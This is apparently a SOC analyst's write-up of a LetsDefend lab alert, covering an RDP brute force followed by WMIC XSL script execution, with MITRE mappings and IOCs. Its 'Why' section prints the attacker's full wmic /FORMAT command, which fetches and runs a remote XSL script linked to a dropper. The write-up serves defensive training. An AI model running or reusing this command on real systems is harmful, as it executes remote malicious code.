// soc investigation 2026-03-05
SOC310 XSL Script Execution Via WMIC.EXE
letsdefend Medium ✓ true positive
mitre/T1220mitre/T1105mitre/T1021-001mitre/T1059-003mitre/T1033mitre/T1049mitre/T1016mitre/T1069-001lolbin
analyst verdict TRUE POSITIVE
✓

🔍 What

An RDP brute force attack originating from 146.70.246.119 successfully compromised the local account letsdefend on host Ambrosine (172.16.17.113). Following the successful login, the attacker conducted hands-on-keyboard reconnaissance before pivoting to a WMIC LOLBin technique, using the /FORMAT flag to fetch and execute a remote XSL script. The payload URL was flagged malicious and attributed to SILENTBUILDER — a dropper and downloader associated with a subgroup of the Conti ransomware collective. No additional network connections were observed. The endpoint has been contained.


🕐 When

August 12, 2024 — 01:50 PM


📍 Where

FieldValue
HostnameAmbrosine
IP Address172.16.17.113
ProcessWMIC.exe
Process PathC:\Windows\System32\Wbem\
Parent ProcessC:\Windows\System32\cmd.exe
Working DirectoryC:\Users\LetsDefend\

👤 Who

FieldValue
Attacker IP146.70.246.119
Compromised Accountletsdefend (local)
Access MethodRDP brute force → successful login
AbuseIPDB VerdictConfirmed malicious

❓ Why

The attacker leveraged WMIC XSL Script Processing (T1220) — a well-documented LOLBin technique — to execute remote code while remaining within trusted Windows binaries. The full command observed:

wmic os get /FORMAT:"https://files-ld.s3.us-east-2.amazonaws.com/wmicscript.xsl"

The remote URL returned 2 malicious flags on VirusTotal, with analysis noting activity consistent with SILENTBUILDER — a dropper/downloader used by a Conti subgroup. The code summary described the payload as a malicious MSI masquerading as a Notepad++ installer.

Prior to WMIC execution, the attacker ran manual recon:

Device action at time of alert was Allowed. No further outbound or inbound connections were observed from the endpoint post-execution. Verdict: True Positive — Incident confirmed. Endpoint contained.


🧩 MITRE ATT&CK

Technique IDTacticTechnique
T1110Credential AccessBrute Force
T1021.001Lateral MovementRemote Services: Remote Desktop Protocol
T1059.003ExecutionCommand and Scripting Interpreter: Windows Command Shell
T1033DiscoverySystem Owner/User Discovery
T1049DiscoverySystem Network Connections Discovery
T1016DiscoverySystem Network Configuration Discovery
T1069.001DiscoveryPermission Groups Discovery: Local Groups
T1220Defense EvasionXSL Script Processing

🔎 IOCs

TypeValue
Attacker IP146.70.246.119
Victim Host IP172.16.17.113
Malicious URLhxxps[://]files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/wmicscript[.]xsl
ProcessWMIC.exe
Parent Processcmd.exe
Compromised Accountletsdefend
Malware FamilySILENTBUILDER (Conti subgroup)

📎 Analysis Reports